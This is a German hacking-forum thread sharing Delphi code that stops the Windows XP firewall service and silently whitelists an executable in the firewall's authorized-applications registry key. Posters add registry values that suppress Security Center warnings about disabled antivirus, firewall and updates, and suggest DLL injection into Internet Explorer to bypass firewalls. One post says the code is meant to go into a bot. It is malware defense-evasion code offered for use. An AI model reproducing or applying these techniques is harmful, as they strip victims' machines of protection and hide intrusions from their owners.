[B] Disable WinXP Firewall

[VincentSX]

[coder: Metador]
[Lang: Delphi]

Code:

program matador;

{$APPTYPE GUI}

uses
  Windows, winsvc, shellapi;
 
procedure Close_Firewal;
var
  SCM, hService: LongWord;
  sStatus: TServiceStatus;
begin
  SCM      := OpenSCManager(nil, nil, SC_MANAGER_ALL_ACCESS);
  hService := OpenService(SCM, PChar('SharedAccess'), SERVICE_ALL_ACCESS);

  ControlService(hService, SERVICE_CONTROL_STOP, sStatus);
  CloseServiceHandle(hService);
end;

begin
  Close_Firewal;
end.

[gORDon_vdLg]

gut, das beendet jetzt den service, ist aber meiner meinung ne blöde möglichkeit weil man so ne meldung erhält das man keine firewall aktiviert hat (kann man in der registry ausschalten, sollte man auch machen wenn man es so tut)

außerdem kann man sich einfach selber in die erlaubnisliste eintragen, das ist natürlich am besten weil man die firewall nichtmal abschalten muss...

Code:

procedure xpfirewall;
var
  reg:tregistry;
begin
  reg:=tregistry.Create;
  reg.RootKey:=HKEY_LOCAL_MACHINE;
  reg.OpenKey('SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List', false);
  reg.WriteString(application.exename, application.exename+':*:Enabled:namedesprogramms');
  reg.CloseKey;
  reg.Destroy;
end;

(unit registry einbinden) ist jetzt nur mal so hingeschrieben aber das sollte gehen. der code trägt das ausgeführe proggie ein, application.exename kann durch jedes andere programm ersetzt werden

[VincentSX]

Stimmt Vollkommen... Dein bsp. ist da natürlich ein wenig praktischer

[gORDon_vdLg]

Unter diesem Key kann man noch die Meldungen disablen (1/0 um es an und aus zu schalten (alle werte dword)):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

AntiVirusDisableNotify (kein virenschutz)
FirewallDisableNotify (keine software firewall)
UpdatesDisableNotify (automatische updates deaktiviert)

[T3l34m3]

und wie kann man das auss eine programm wider aktivieren ?
also beispielt:

aus:
der Code von gORDon_vdLg

ein:
DAN ETWAS sO:
procedure xpfirewall;
var
reg:tregistry;
begin
reg:=tregistry.Create;
reg.RootKey:=HKEY_LOCAL_MACHINE;
reg.OpenKey('SYSTEM\CurrentControlSet\Services\Sha redAccess\Parameters\FirewallPolicy\StandardProfil e\AuthorizedApplications\List', true);
reg.WriteString(application.exename, application.exename+':*:Enabled:namedesprogramms') ;
reg.CloseKey;
reg.Destroy;
end;

Und/oder muss ich das dann raus nehmen:

Code:

reg.WriteString(application.ExeName, application.ExeName+':*:Enabled:namedesprogramms');
reg.CloseKey:

den will ja keine neue reg

[wuff]

soviel ich weiß läuft dieser fw-bypass nur mit sp2, also vorher checken welches servicepack installiert ist . wenn ich falsch liege verbessert mich.

[gORDon_vdLg]

@T3l34m3: also das false was du zum true gemacht hast entscheidet nur darüber ob der key erstellt wird wenn er nicht existiert... um das programm aus der liste rauszunehmen einfach den string aus der registry löschen. um ein programm zu verbieten folgenden key einfügen:
reg.WriteString(application.exename, application.exename+':*:Disabled:namedesprogramms');
und nicht vergessen application.exename durch etwas gewünschtes zu ersetzen.

@wuff: kam die fw nicht erst mit sp2 dazu??

@rest: wenn das nicht hilft kann man sich immer noch per dll injection z.B. über den inet explorer unterhalten, der ist wohl bei allen freigeschaltet^^ (geht nicht bei allen firewalls)

[T3l34m3]

jop das weiss ich...
und danke für die erklärung

habs verstanden ^^

[eko18]

sry leute ich will mich als noob nicht einmischen,aber kann das einer mal 'kompilieren?' also daraus ne .exe machen?

[botfreaker]

sry leute ich will mich als noob nicht einmischen,aber kann das einer mal 'kompilieren?' also daraus ne .exe machen?

warum sollte das jemand linken? das bringt doch gar nichts, das musst du schon in ein programm einbauen, zb in nem bot usw...